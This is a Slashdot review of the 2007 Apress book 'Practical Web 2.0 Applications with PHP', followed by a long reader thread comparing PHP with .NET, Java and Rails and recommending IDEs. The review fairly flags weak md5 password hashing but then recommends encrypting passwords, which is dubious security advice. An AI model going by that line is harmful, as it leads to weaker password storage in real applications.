Practical Web 2.0 Applications with PHP

Michael J. Ross writes "Web 2.0 applications and sites commonly employ a number of technologies: PHP, MySQL, XHTML, CSS, JavaScript/Ajax, microformats (standard formats for HTML data), tags (keywords for categorizing site content), and Web feeds (formatted and streamed Web content, usually in XML, such as an RSS feed). Because learning and using most of these technologies can be rather challenging to a Web developer, perhaps the best way to get started doing so is by using all of them to create a single Web-based application, with no pretense at mastering any one of them. This is the approach taken in Quentin Zervaas's book, Practical Web 2.0 Applications with PHP." Read on for the rest of Michael's review. Practical Web 2.0 Applications with PHP author Quentin Zervaas pages 569 publisher Apress rating 7/10 reviewer Michael J. Ross ISBN 1590599063 summary An example-based guide to PHP and Web 2.0 technologies. The book was published by Apress, on 20 December 2007, under the ISBNs 1590599063 and 978-1590599068. On the book's Web page, visitors can read and submit errata (apparently none, as of this writing), read the online table of contents, download Chapter 11 ("A Dynamic Image Gallery") as a PDF file, and purchase an electronic version of the book.

Given the number and complexity of the technologies discussed in the book, it is little wonder that it is 569 pages long. There is certainly a generous amount of material, and it is grouped into 14 chapters: planning and designing the sample application; application framework setup; user authentication, authorization, and management; user registration, login, and logout; Prototype and Scriptaculous; page styling using CSS; creating a blogging system; extending the blog manager; personalized user areas; Web 2.0 features (tags, Web feeds, microformats, and public profiles); the image gallery; site search functionality; integrating Google Maps; deploying and maintaining the site.

The first two chapters set the stage for the rest of the book. Chapter 1 provides a brief overview of Web 2.0, the sample Web-based application to be developed in the book, database connectivity, search engine optimization, PHPDoc, templating, and security, as well as the major features of the sample application, namely, a blog site. Chapter 2 describes how the reader can set up the application framework needed to follow along as the author explains how to build the sample application. This includes brief descriptions of how to install Apache, MySQL, PHP, and the Zend Framework. In fact, the book makes so much use of the Zend Framework that, after reading it from cover to cover, the reader will have gained a strong understanding of how some of the most popular components of that framework can be employed in their own projects. The chapter describes the file system structure the author has chosen, how to configure your Web server, how to set up the database, and how to connect to that database. It also provides an introduction to the Model-View-Controller (MVC) design pattern, as well as the Smarty template engine — both of which are used later.

While the introductory material in the first two chapters is essential — particularly to any inexperienced programmer — and generally spot on, some of the material could use a significant amount of expansion and clarification. For instance, in Chapter 2, the instructions on how to configure one's Web server, could easily prove confusing to most readers, because the author refers to the IP address 192.168.0.80, with no explanation as to what it is and how it relates to the usual local Web server address, 127.0.0.1 (localhost). His recommendation for a "hosts" file entry, "192.168.0.80 phpweb20," certainly does not help clarify matters. Furthermore, the author does not explain why "phpweb20" should be used instead of "localhost." In the subsequent discussion on virtual hosting and Linux, in a "Note," he mentions that the reader "must have previously included the NameVirtualHost 192.168.0.80 in your main Web server configuration..." In another note on the same page, he provides instructions on the PHP setup that should have been included earlier, in the section on installing PHP. In general, there are too many instances in the early chapters where key information is presented not where the reader would need it, but pages later. This can be especially exasperating to readers who are fairly new to the technologies, and are trying their best to follow the author's examples, every step of the way.

Chapter 3 discusses user authentication, authorization, and management. Unlike most PHP books, this one does not limit the reader to using MySQL as the relational database management system in conjunction with the sample application. The downloadable code for the book makes it possible for the reader to use PostgreSQL, even though the text itself focuses on MySQL. This flexibility is made possible by the author's use of the Zend_Db class. Admittedly of little significance, some of the book's SQL code looks a bit puzzling in some places. For instance, on pages 46-47, unneeded blank lines are contained within the "create table users" statement, with no reason given. Of greater importance, the chapter includes a short but valuable section describing the potential problems of date and datetime values in MySQL caused by server time zones, daylight savings, etc. — a topic well worth reading up on. The fourth chapter explores user registration, login, and logout functionality. Crucial topics such as password reset are covered, while some others, such as password strength, are not — no doubt due to space limitations.

Ajax is considered a central part of the new Web 2.0 trend, and for doing Ajax, the author recommends Scriptaculous, which is based on Prototype — both introduced in Chapter 5. The basic CSS styling of the sample application's Web pages, is covered in Chapter 6. The only flaw in the sample CSS code is that the author formats the declarations within each rule inconsistently, with some rules having multiple declarations on a single line, and others having each declaration on a separate line, which most people find easier to read and maintain. A highlight of the chapter is the author's comparison of the advantages and disadvantages to using a print-only CSS stylesheet versus a dedicated secondary print page — a topic not even seen in Web programming books that focus on design and CSS. The chapter concludes with a discussion of client-side form validation using JSON.

Chapters 7 through 13 focus much more on the sample application's functionality: implementing the user blogging system, and supplementing it with a blog manager index, Ajax capabilities, and a WYSIWYG editor (FCKeditor); creating user areas that can be customized by the users themselves; implementing the aforesaid Web 2.0 features (tags, Web feeds, microformats, and public profiles); implementing a dynamic image gallery, using GD for resizing, etc.; adding site search capabilities using Zend_Search_Lucene; incorporating Google Maps into the users' public blogs. All of these chapters are chock full of sample code, which the energetic reader may want to test out in their own development environments — particularly if they want to follow the author in creating the sample application. Fortunately, the reader will not have to waste any of that energy typing in code, because it can all be downloaded from the author's book site.

Specifically, Chapters 7 and 8 are devoted to the blogging capabilities of the sample application. While the discussion of permanent links, filtering, and the FCKeditor WYSIWYG editor may be of interest to a reader not implementing blogging themselves, the book at this point becomes more narrow in the information that it conveys — focusing even more on the code of the sample application. After reading through dozens of pages listing the code for blog entry management, readers may begin asking themselves, "Why not just use a CMS, instead of reinventing the wheel?" It should be borne in mind that the point of the book is not to advocate reinventing the wheel, but rather to show how a sturdy and reliable wheel can be built. Nonetheless, readers will need fortitude to plow through the many pages of code.

Despite the obvious expertise of the author, readers should be alert and open-minded to potential pitfalls. In the sample application's code, for generating passwords, the author uses only a hash function, md5(), despite its vulnerability to rainbow tables. The reader is advised to use an encryption function instead of — or in conjunction with — any hash function. The book contains another example of inattention to data security: In Chapter 4, as part of the user registration process, the user's password is e-mailed to the new registrant, naturally in plaintext, making it visible to anyone who intercepts the e-mail message. Years ago, all sorts of online organizations were following this lamentable practice; fortunately, "nasty grams" from security-savvy users seem to be turning the tide.

After exploring the possibilities of dynamic image galleries and Google Maps, the last chapter may appear relatively uninteresting to the reader, because it discusses application logging, error handling., and Web site deployment and maintenance, including backups. These topics may not seem too exciting, but failing to take the lessons to heart, and then experiencing a heart-stopping crisis on one's production site, will be the kind of excitement no Web programmer wants to experience.

What distinguishes this book from the majority of other PHP titles — for better or for worse — is that the author makes extensive use of specific frameworks and other tools, such as the Smarty templating engine and the Zend Framework, as well as classes that he has written, which are freely available in the source code. As a result, the value of the book to the reader is, to a certain extent, proportional to how much that reader wants to learn and possibly use those components. For example, if the reader chooses, for whatever reason, to not use the MVC design pattern and the Zend_Controller class for implementing MVC in their application, then the author's use of these will appreciably reduce the value of the book to that particular reader. In fact, given how lengthy Chapter 2 is, such a reader may mistakenly conclude that the rest of the book would be of no greater interest to them, and consequently become discouraged and quit reading. Other examples include the homebrew DatabaseObject and Profile classes, discussed in Chapter 3. Regardless, some readers may find that even if they do not use the author's chosen tools for their own applications, there is enough other programming and application-focused information that makes the book worthwhile to them. Other readers will be disappointed in the overall value of the book should they choose not to follow the author's recommended approaches. In addition, some programmers may be quite hesitant to base one of their own applications — particularly for paying clients — on classes created by a single developer, with no accompanying unit testing code to verify its soundness.

In terms of the production of the book, it is definitely up to par, with a font that is readable and yet small enough to get plenty of information on each page — in conjunction with the bottom margins being utilized better than in other books. However, at least for my particular copy of the book, several blocks of pages were cut with different widths, making it appear as if one or two blocks had become detached from the glue binding, when in fact they were all well attached. Within the binding glue, they were all attached at an equal depth, indicating that it was the cutting of the pages that caused the problem, and not how the blocks were set in the binding.

Even though some readers may find the book overly focused on particular frameworks and other tools, Practical Web 2.0 Applications with PHP is an instructive and expert demonstration of how to use PHP, MySQL, the Zend Framework, Smarty, Ajax, and other powerful technologies for creating robust Web sites.

Michael J. Ross is a Web developer, writer, and freelance editor.

You can purchase Practical PHP Web 2.0 Applications from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Wait...

[Eddi3]

Since when is PHP practical?

Re:Wait...

He's not saying PHP is practical. He's giving you a guide to create web applications which are practical, using PHP.

Re:Wait...

[CastrTroy]

You're probably going to get modded into oblivion for that, but I find that it has a lot of truth. Compared other web development technologies like .Net and Java, PHP seems really unorganized and difficult to program in. Everything under the same namespace is probably the most annoying part. Next is that fact that there's about 7 different ways to do everything. I have yet to find a good IDE that does autocompletion (intellisense) for your coding. And with an API as disorganized as PHP's, I would very much appreciate it.

Re:Wait...

[drspliff]

You can't have looked hard then, there are many good quality IDEs for PHP out there, although notably the big three are:

  Eclipse PDT (and Zend's PDT based 'Neon' product)
  NuSphere PHPed
  Zend Studio

Sure it takes a while to get the hang of the nuances in function naming and parameter ordering, and even now I still need to lookup some functions in the manual, but for most purposes the auto completion in Eclipse PDT works well - it fully supports auto-completion for user & system code along with classes and javadoc/phpdoc style documentation comments.

Re:Wait...

[CastrTroy]

I tried ZendStudio and their Eclipse project. Last time I checked, it didn't have autocomplete/intellisense for the functions that were part of my code at least the ones from other files that had to be included. I seem to remember it working for the core PHP functions, but not for any of the code I had actually written. Despite how much I don't like Microsoft's server products, VS.Net is an amazing IDE.

Re:Wait...

Compared other web development technologies like .Net and Java

Compared to using a nuke to swat a mosquito?

PHP seems really unorganized and difficult to program in

Lack of namespaces and inconsistent function name / calling conventions -- yes. What else?

there's about 7 different ways to do everything

How's that a drawback?

I have yet to find a good IDE that does autocompletion (intellisense) for your coding.

I've yet to find a good IDE period but that has nothing to do with any particular language or runtime.

PHP sucks but when you get right down to it, so does pretty much everything else. You want something that really sucks -- RAILS. Being asked to do a RoR site because some suit heard it's cool is equivalent to being asked to code in a straight jacket!

Re:Wait...

[dubbreak]

I haven't used it myself, however Aptana Studio has been recommended to me. It's based off Eclipse and does CSS, JS, HTML, PHP, RoR it has a JSON editor and has a bunch of Ajax libraries built in.

Re:Wait...

[sherriw]

Difficult to program in?? Try figuring out how to use a certian function or class in .Net and you have to navigate the *horrid* MSDN site. Conversely the PHP.net site is fast, easy to search and navigate, and has tons and tons of helpful user comments on each item. I haven't found anything that comes anywhere close to the online PHP.net reference for any other language I've used.

Add to that, the massive headache that new .net users face (I was one last month) when getting set up. Configuring their own PC, the IDE, all the libraries and packages and then getting Visual Studio set up. Compared to PHP, you grab a cheap PHP web hosting provider and a friggin text editor or the IDE of your choice and you're running a hello-world in under 10 minutes.

Add to that the massive library of FREE addons, libraries, scripts and opensource projects that you can learn from or incorporate... and I'd say the massive number of PHP newbies out there indicates how EASY it is to use. Did I mention free? And open - as in not tied to the whims of one corporation.

I'll refrain from listing good IDEs since I see another responder has done so.

Re:Wait...

[LowSNR]

You might try looking at VS.PHP -- it's not free and it requires VisualStudio, but it does do a pretty good job with intellisense and auto-complete (it uses VisualStudio's own capabilities as a matter of fact). I haven't used it in a while (3 yrs or so), so it may not be as good as current alternatives, but it might be worth a look for you.

Re:Wait...

[thePowerOfGrayskull]

For when I must dirty my hands with PHP, I use Visual SlickEdit which has great auto-completion (and many other) facilities for PHP + a ton of other languages. Heck, it was even simple to add autocompletion support for nwscript, the scripting language used by the game neverwinter nights/neverwinter nights 2.

Re:Wait...

[CastrTroy]

You don't have to navigate MSDN. You put your cursor on the desired function, and press F1. Alternately you can search for the function/class name, and it usually shows the correct item in the first 3 or 4 results. With .Net, you get all the documentation on your local machine. No need for a net connection. I will admit that the user comments on PHP.Net are nice. However, a lot of the comments are just useless, and don't really offer much. With .Net, you can install the free IDE, and there's no configuration necessary. It even has it's own web server that it installs. You can edit the code while debugging and changes take effect immediately. You can even rewind from an exception that has already happened, fix the problem, and continue on debugging, without ever even stopping. Try getting a debuggable PHP install working on your local machine, and compare that to the ease of installing VS.Net. You can also get a lot of cheap hosting providers that support ASP.Net now.

Re:Wait...

[Goaway]

"Nuances"? That's a funny way to describe something that is entirely random.

Re:Wait...

[Dragonslicer]

When was the last time you checked? I have Zend 5.2 at work, at it does auto-completion fine for user-defined functions, classes, etc. in the project. You did create a project to work from, right?

Re:Wait...

[UnknowingFool]

Compared other web development technologies like .Net and Java, PHP seems really unorganized and difficult to program in.

Have you ever coded in Perl? I remember the first time I saw Perl:

Me: Hey Bill, you know when I asked to send over some perl scripts for me to learn perl, I think it got messed up. Part of it looks encrypted or encoded or something.
Bill: It's not encrypted or encoded. That's how perl usually looks.
*My head explodes*

Re:Wait...

[Sancho]

Lack of namespaces and inconsistent function name / calling conventions -- yes. What else? I'll chime in with "making it easier to mix design and code than it is to separate the two."

there's about 7 different ways to do everything How's that a drawback? It makes it harder to read and maintain applications that you didn't author.

PHP sucks but when you get right down to it, so does pretty much everything else. You want something that really sucks -- RAILS. Being asked to do a RoR site because some suit heard it's cool is equivalent to being asked to code in a straight jacket! I couldn't agree more, but I do think that there are lessons that could be learned from Rails. Rails enforces templating, which is generally a good thing. I also like models for applications which don't need advanced database functionality. In fact, I think that MVC itself is a pretty decent programming model--it's just that most of the frameworks that implement it (like Rails) work for very specific application types, and any deviation from this norm requires more work than if you were implementing the site using a conventional paradigm.

Re:Wait...

[batkiwi]

-Install .NET 3.5 (likely already installed on your windows box through windows update)
-Install VS2008 Express (comes with sqlexpress, no setup necessary for it seperately)
-Start programming, with intellisense help (web apps, console apps, windows apps, etc)

That's quite hard! No web server to install. No "15 different libraries all to talk to the same database". No "now install 15 different libraries, all of which take parameters in different orders and have differing semantics". Etc.

Re:Wait...

You should try Komodo. It's fantastic. Komodo Edit is free (as in beer and speech), too.

Re:Wait...

[Lewrker]

I would send you obfu C code just to mess with your head.

Re:Wait...

[Tumbleweed]

Bill: It's not encrypted or encoded. That's how perl usually looks.

As the saying goes, "Java is executable bytecode, Perl is executable linenoise." :)

Re:Wait...

I'll chime in with "making it easier to mix design and code than it is to separate the two."

Design is done with CSS :) If you're talking about separation I agree, with the caveat that PHP is a template language (ie: "Smarty" is the inverse of the name).

It makes it harder to read and maintain applications that you didn't author.

That's hardly specific to PHP though, I find Java worse than PHP for that. "why is this code using HashMap instead of Vector" etc... Idiocy transcends language boundaries.

Rails enforces templating, which is generally a good thing.

Keyword "generally". I've got several small apps that exist as single PHP files. Forcing separation (or even OOP) here is not a good thing, it's pointless and stupid.

I also like models for applications which don't need advanced database functionality. In fact, I think that MVC itself is a pretty decent programming model--it's just that most of the frameworks that implement it (like Rails) work for very specific application types, and any deviation from this norm requires more work than if you were implementing the site using a conventional paradigm.

Very well put :) Something I find myself repeating often, "MVC is a methodology, not a framework".

Re:Wait...

I have tried pretty much every PHP-capable IDE/Editor and hands down the best is Nusphere PHPEd (windows only). Zend Studio is very close and Eclipse PDT (the open-source basis of Zend Studio for Eclipse) is getting there, but the intellisense and other features aren't nearly as complete as Zend Studio and PHPEd. I have not tried the official Zend Studio for Eclipse releases since I did not really like PDT.

My impressions come from about 2 years on PHPEd, a few months with PDT and a couple of days with Zend Studio and other products (such as PHPEdit).

Here are some of things that draw me to PHPEd:
- Full intellisense/autocomplete for all PHP code and all of your PHP code from anywhere in your project
- Full parsing of PHPDoc comments
- Multi-line PCRE regex find and replace across files/directories/current project
- SFTP/FTP project mapping like "Sites" in Dreamweaver
- DB console that works with SQLite, MySQL, Postgre, MSSQL, Oracle and others
- Full debugger, local web server, code performance analysis

Zend Studio 5.5 seemed pretty good from my usage (it has a lot of the features PHPEd has), however I disliked a few things:

- It ran on Java which always seems to make apps feel more sluggish
- It requires 1 license per computer, so you can't share your license at home and at work
- It was more expensive that PHPEd

PDT (the basis for the new Zend Studio for Eclipse) was ok, however it had the following issues. Note that these issues will be different if you but Studio for Eclipse since it comes with specific bundled software:

- It took a while to get the interface to a state where I was productive with PHP stuff (be sure to have the right version of the JVM!)
- All of the database interaction was through separate JDBC drivers which were a pain to set up
- The code intellisense/autocompletion did not always work properly and did not fully parse PHPDoc comments

I'm sure this all sounds like an ad for the product, but I just _really_ enjoy using PHPEd.

Re:Wait...

[bahwi]

Zend? Aptana? Have you looked? You know we're talking about PHP here? You seem to have confused it with something else.

Re:Wait...

[ShieldW0lf]

First thing I do with any IDE is turn off auto-completion. I find that my fingers have already typed the entire function name and hit space before my eyes register that the stupid IDE has replaced my text with some wrong guess. Stupid, stupid concept right from the word go.

Re:Wait...

[drpimp]

Open Komodo or Komodo Edit - It's free, cross-platform, and code-completion is the best I have seen in a PHP IDE (Although it does much more than just PHP). It will pull up methods from classes that you have instantiated that it has parsed from your "include" or "require" calls. Every PHP coder I have turned it on to love it. Although there are a few bugs with tab spacing, but I imagine those will be ironed out soon enough.
The Pro version also include XDebug capabilities, amount others, which can completely eliminate the old quick and dirty "echo" debugging.... I know I know so bad, so bad

Re:Wait...

[Hognoxious]

So, where are you from? Dortmund, Frankfurt, Berlin ...?

Re:Wait...

[Sancho]

Design is done with CSS :) Yeah, I meant markup.

That's hardly specific to PHP though, I find Java worse than PHP for that. "why is this code using HashMap instead of Vector" etc... Idiocy transcends language boundaries. Perhaps, but features of a language can increase or decrease the difficulty of reading and comprehension.

Keyword "generally". I've got several small apps that exist as single PHP files. Forcing separation (or even OOP) here is not a good thing, it's pointless and stupid. Well, PHP was originally a templating language :) In fact, the common problems I have with it are when there's more PHP than HTML. When used as a templating language, it's just fine, and it makes sense for it to all be in one file. Other times, I'm not so sure, but I'd be hesitant to say that there's NEVER a time when one file doesn't make sense--it just usually doesn't. PHP's an enabler in this case, though.

Re:Wait...

[Greg_D]

Easy way to get a functional eclipse setup for PHP and web development:

Go here to get the Yoxos Eclipse distro (I like this one because it does the best job of finding your dependencies for you).

http://ondemand.yoxos.com/geteclipse/start

In plugin explorer, search for and schedule PDT, SQL Explorer, and either Subclipse or whatever is compatible with your versioning software.

Click Start Download, and then unzip and copy the eclipse directory to somewhere suitable.

Meanwhile, go here:

http://www.aptana.com/studio/download

And click on the Eclipse Plugin tab and download the plugin.

Then open Eclipse, go to the workbench, and in the menu, do Help > Software Updates > Find and Install, then choose to Search for New Features to Install, then choose install from archive and point it at the plugin you just downloaded. It will tell you it needs to restart afterward.

Now you have a functional IDE, and you can use Window > Show View > Other to choose whatever panels you want to have open in your workspace. I mix and match Aptana and PDT.

Last but not least, you need the Zend Debugger. Do Help > Software Updates > Find and Install, then do Help > Software Updates > Find and Install, then choose to Search for New Features to Install, then choose New Remote Site. For Name, put Zend Debugger, and for URL, put http://downloads.zend.com/pdt. Make sure that site is checked in the list, then click Finish and it will search for your debugger. Find it, install it, then do go here:

http://www.thierryb.net/pdtwiki/index.php?title=Using_PDT_:_Installation_:_Installing_the_Zend_Debugger#Installing_Zend_Debugger_client

And follow whatever directions are consistent with the platform you're using.

Re:Wait...

[kestasjk]

You don't have to navigate MSDN. You put your cursor on the desired function, and press F1. Alternately you can search for the function/class name, and it usually shows the correct item in the first 3 or 4 results. Replace F1 with F2 and Eclipse with PDT does the same thing. phpDoc is used very similarly to Microsoft's way of being able to comment code.

Also the GP who promoted Java; it's now very easy to use Java functions from within PHP, so if you require Java it's no problem to use it from directly within a PHP app. Also PHP6 will bring namespaces, so I think all of the gripes about PHP I've seen so far in this topic are outdated.

Re:Wait...

[CastrTroy]

Just because they've introduced namespaces as a feature in the language, doesn't mean the entire API gets organized using namespaces.

Re:Wait...

[drspliff]

Most of the time I've typed 5 or 6 characters and the auto-completion engine in Eclipse picks up the most used functions and lets you continue typing, meaning most of the time I type only half the functions name then hit the enter key to continue in the the arguments while at the same time popping up a reminder of which arguments and their types that it expects.

I've found that it doesn't get in my way and most of the time I it speeds up the manual labor part of writing code, it lets me express my ideas quickly.

Re:Wait...

[ttfkam]

That's hardly specific to PHP though, I find Java worse than PHP for that. "why is this code using HashMap instead of Vector" etc... Idiocy transcends language boundaries. Java is worse than PHP? Because of *that*!? For one, I think you meant to say, "Why is this code using Hashtable instead of HashMap," or perhaps say, "Why is this code using Vector instead of ArrayList?" For anything since Java 1.2 (many years ago), you should only be using Vector or Hashtable for legacy code that must work with very old VMs or if you need to access the data structure from multiple threads. Pretty straightforward to me as any Java programmer worth their salt knows this.

The fact that just about everyone uses javadoc is clearly another reason why Java is better than PHP.

Keyword "generally". I've got several small apps that exist as single PHP files. Forcing separation (or even OOP) here is not a good thing, it's pointless and stupid. And in those cases, JSP files would work just as well. (Or ColdFusion or ASP or just about any other solution out there. The simplest cases are handled well by everyone; PHP is nothing special here.)

Re:Wait...

[1110110001]

Just because they've introduced namespaces as a feature in the language, doesn't mean the entire API gets organized using namespaces. So this means the namespace argument is bullshit. You don't get a good API just because you have namespaces, but also you can have a good API without namespaces. Seems like if people need strawman arguments to bash PHP it can't be that bad.

Re:Wait...

[klokop]

Does ViM count as an IDE? It's got autocompletion and all (or 'intellisense', as the kids are calling it these days). It'll take some fiddling to get AC working in ViM6, but in ViM7 it's build in.

Re:Wait...

Hahahahaha!!! you are so funny! This line never gets old...

Re:Wait...

[Raphael+Emportu]

.net? Are you really comparing that to PHP? How come? What did you pay for Php? Are you the victim of...?

Re:Wait...

[vinscom]

More layer, more slower!!! I came across a erail.in, Not a very high fi site, but, what it does is cool!!! A perfect balance one can say and very useful in my country. It seems whenever we think of terms like AJAX,we always overdose it. Gmail is an excellent application, but, problem is that now days I check my email so frequently that just to check 1 email, it looks Gmail take zillion time more time then checking my mail without all new AJAX based technology. And I realized that when I shifted my Hotmail account back to simple old non-AJAX based interface, it is lighting faster then any AJAX based interface when you have to check just one or even more mail and log-out!!!! Same is true for Yahoo too!!! Unfortunately, Gmail does not provide that!!!!

Re:Wait...

[MadMidnightBomber]

Sure it takes a while to get the hang of the nuances in function naming

You misspelt 'nuisances'.

Re:Wait...

It's got autocompletion and all (or 'intellisense', as the kids are calling it these days)

Urg, I HATE that. Anyone using the word "intellisense" to refer to anything other than Microsoft's implementation needs to be ground up and fed to the pigs.

Re:Wait...

Also PHP6 will bring namespaces, so I think all of the gripes about PHP I've seen so far in this topic are outdated.

Did they replace create_function with something not psychotically insane? If not, have a new gripe.

Re:Wait...

[devjj]

I'm a Rails developer, and I take offense to that. I make decent money and - more importantly - I'm happy. Your dislike of it doesn't make it a bad framework.

Employee?

Web 2.0 applications and sites commonly employee a number of technologies: PHP, MySQL, XHTML, CSS, JavaScript/Ajax

Man, I wish I knew how to get PHP, MySQL, and all them other newfangled technologies to do the work for me! Instead, here I am trying to beat them into submission all the time and they still do anything BUT what I told them to do!

I've said it before and I'll say it again

PHP: Because 10 million newbies can't be wrong.

Re:I've said it before and I'll say it again

[K.+S.+Kyosuke]

Never has the fight for COBOL's throne been so fierce...until PHP and Java clashed!

Re:I've said it before and I'll say it again

[teknopurge]

Java is in a higher league than PHP. It's no contest.

Regards,

Re:I've said it before and I'll say it again

[Hamstaus]

For building web apps? Facebook might disagree with you. The people who start the PHP/.NET/Java flamewars somehow almost always forget that PHP is a language solely designed for building web sites, whereas Java and the .Net framework are not. Java and .Net can build web sites, but if you're going to compare them, you need to compare them on that level.

Re:I've said it before and I'll say it again

[misleb]

For building web apps? Facebook might disagree with you.The people who start the PHP/.NET/Java flamewars somehow almost always forget that PHP is a language solely designed for building web sites,

I would say that it is good for building web *sites* but not so much web *apps*. PHP is fine if all you need is a little dynamic content here and there, but for applications it falls short, IMO. PHP is a bland, unexpressive language with a bunch of modern features such as OO bolted on as an afterthought.

whereas Java and the .Net framework are not. Java and .Net can build web sites, but if you're going to compare them, you need to compare them on that level.

So we should just ignore the fact that PHP is all but useless for anything but serving up web pages? Reality is that many web applications also have significant backend functionally. Starting with PHP might be a handicap in that case.

Oh well, not really interested in a PHP flamewar. Suffice it to say that ever since I've discovered Ruby and Python, I don't want to touch another line PHP code again. I don't care if you do dress it up in some MVC framework, it still looks like a turd to me.

Something I find funny about PHP is that someone actually wrote a templating language for it (Smarty). I thought PHP WAS a templating language!

-matthew

Re:I've said it before and I'll say it again

[Sancho]

I would say that it is good for building web *sites* but not so much web *apps*. PHP is fine if all you need is a little dynamic content here and there, but for applications it falls short, IMO. That's a pretty good way of looking at it. Usually, I find that PHP makes for unmaintainable code. Simple websites don't have this problem, but then, simple websites sometimes grow up to be large ones.

Oh well, not really interested in a PHP flamewar. Suffice it to say that ever since I've discovered Ruby and Python, I don't want to touch another line PHP code again. I don't care if you do dress it up in some MVC framework, it still looks like a turd to me. Well I hate Rails vehemently, but I'm liking Django (an MVC framework for Python.) Both have limitations, though. I used to think that a PHP MVC framework might be ok, but then I remembered that a lot of the things that I hate about PHP would still exist.

Something I find funny about PHP is that someone actually wrote a templating language for it (Smarty). I thought PHP WAS a templating language! This happens all the time. People take a perfectly reasonable tool and try to apply it in ways for which it was never designed. Then the developers add features to make those uses easier, and you end up with a crappy tool that does the job.

Re:I've said it before and I'll say it again

[Hognoxious]

Facebook might disagree with you.

Well if that doesn't convince him he's wrong, nothing will!

Re:I've said it before and I'll say it again

[Hamstaus]

That's a pretty good way of looking at it. Usually, I find that PHP makes for unmaintainable code. Simple websites don't have this problem, but then, simple websites sometimes grow up to be large ones.

That's a programmer problem, not a language problem. It's just as easy to write understandable, maintainable code in PHP. PHP gets a bad reputation because it's so accessible to newbies, who write bad code. But in the hands of an experienced programmer, it's no different than any other language.

Well I hate Rails vehemently, but I'm liking Django (an MVC framework for Python.) Both have limitations, though. I used to think that a PHP MVC framework might be ok, but then I remembered that a lot of the things that I hate about PHP would still exist.

You should take a look at Zend's PHP framework. There are a lot of other ones out there too.

This happens all the time. People take a perfectly reasonable tool and try to apply it in ways for which it was never designed. Then the developers add features to make those uses easier, and you end up with a crappy tool that does the job.

This is very true. However, Smarty is supposed to remove presentation from the programmers. So if your business has a design/graphics team that can do templating but not programming, Smarty would be an option. If your programmers are the guys making the site, then Smarty is just an extra layer of overhead, and you should just use PHP as your templating structure.

As an exercise, I built a skeleton MVC framework using PHP, and it was very easy to create different view layers, one for Smarty and one for PHP templates. Arguing which way is better is pointless, because it totally depends on who's going to be using it, and not the actual template language itself.

Re:I've said it before and I'll say it again

[misleb]

That's a programmer problem, not a language problem. It's just as easy to write understandable, maintainable code in PHP. PHP gets a bad reputation because it's so accessible to newbies, who write bad code. But in the hands of an experienced programmer, it's no different than any other language.

Frameworks help a lot. The problem with PHP is that everyone ends up writing their own quirky framework. But even then, PHP as a language is somewhat unexpressive with an object model that feels bolted on as an afterthought.

You should take a look at Zend's PHP framework. There are a lot of other ones out there too.

But ultimately it is still boring ol' PHP with a zillion inconsistently named and implemented functions in a flat namespace.

This is very true. However, Smarty is supposed to remove presentation from the programmers.

Which is kind of ironic because wasn't PHP designed to *combine* presentation and programming? That's the only case in which I'd use PHP, at least. Why would I use a language that was designed primarily as a templating language for anything else?

-matthew

Re:I've said it before and I'll say it again

[smellotron]

Usually, I find that PHP makes for unmaintainable code. Simple websites don't have this problem, but then, simple websites sometimes grow up to be large ones.

Think about it like a math word problem:

1. Small PHP websites are significantly easier to develop than small Java websites
2. Large/complex PHP websites are significantly harder to develop than large/complex Java websites
3. Some small percentage of all small websites grow up into larger websites. The others remain small or disappear entirely.

If you operate on the basis that most websites stay small (maybe 95-99%), the it's more useful to do the crappy solution first, and simply accept the cost of upgrading it to a good solution when it's already "proven" itself in on the Internet.

Re:I've said it before and I'll say it again

[Escogido]

PHP is a language solely designed for building web sites, whereas Java and the .Net framework are not. Java and .Net can build web sites, but if you're going to compare them, you need to compare them on that level. Is that to imply that something which is specifically built for a purpose is always better at said purpose than something which is built for a broader range, including the purpose in question?

Re:I've said it before and I'll say it again

[Hamstaus]

Is that to imply that something which is specifically built for a purpose is always better at said purpose than something which is built for a broader range, including the purpose in question?

Don't be ridiculous. Nowhere did I imply that, or even say which one I thought was "better". I said you need to evaluate them on the same level, ie. their ability to build web applications. You wouldn't compare a 3-in-1 Printer/Scanner/Fax to a Laser Printer and say "The 3-in-1 has more features, so it's better at printing."

What I'm pointing out is that the features of Java and .Net are often compared to PHP in a broad view when that doesn't make sense, and it's something you have to be careful of.

This is how I learn.

[qoncept]

This is basically how I learned PHP. Without any PHP or mysql experience or even understanding the concept of a loop, I used tutorials from webmonkey.com and made cobbled together a weak CMS system over the course of a couple weeks. When I finished I immediately wanted to start over using what I'd learned.

Re:This is how I learn.

[CastrTroy]

Most of the tutorials on the web show the wrong way of doing things. Want to connect to MySQL? The tutorials say to use MySQL_ functions, and the really good ones tell you to use mysql_real_escape_string to ensure that don't subject yourself to sql injection attacks. Most of them leave this out. The best way to actually do it is to use PDO with prepared queries (not talking stored procedures here) so that you don't have to remember to escape your strings, and plus it speeds up queries a little. You also get the added advantage of not being tied to MySQL. Because of the terrible quality of most of the tutorials, most PHP programmers never learn the right way of doing anything, and when they do, they feel like going back and redoing all their work, because the way they did it before was so poor. I've done it myself a few times.

Re:This is how I learn.

[syousef]

It concerns me that someone that doesn't understand the concept of a loop is programming a CMS. Was this hobby work done in your spare time, or a tutorial? Or was it paid professional work???

Re:This is how I learn.

[qoncept]

I think best practices and the ideal implementation in your code is beyond the scope of a tutorial or a book. You're not expecting to finish it and be an expert. Tutorials are a great way to get practical knowledge (something you won't get much of in most classes (not that they don't offer other advantages)). I think any text that attempts to introduce every single such detail would end up with most of it being lost on the reader and what would have been simple enough becoming convoluted. Learn the language, then learn to make best use of it.

Re:This is how I learn.

Doesn't really matter as long as it's securely away from public reach and does what the person who wanted it wants...

Re:This is how I learn.

[qoncept]

It was hobby work, and don't worry -- 8 years later I definately understand the concept of a loop. The tutorial I used assumed, I would imagine, that you already knew what a loop was. Maybe I skipped a tutorial or 2, I don't remember. I was able to recognize that, "hey, it's doing the stuff in this code once for each row my query returns!" and use it accordingly.

CMS might be a little kind. I was able to post stories and people were able to leave comments, along with admin and registration pieces.

Re:This is how I learn.

[CastrTroy]

The best practices and ideal implementation should be the only thing covered in the books/tutorials. If you don't have room for multiple implementations, you should at least include the most correct solution.

Re:This is how I learn.

[debrain]

I concur. The signal-to-noise ration of most tutorials on the net is abysmal.

To figure out how to do things, I started piecing together tutorials, to make things just work. To really figure out how to do it right, I started disassembling code from large, popular hacking-targets such as Wordpress.

Re:This is how I learn.

[glwtta]

I think best practices and the ideal implementation in your code is beyond the scope of a tutorial or a book.

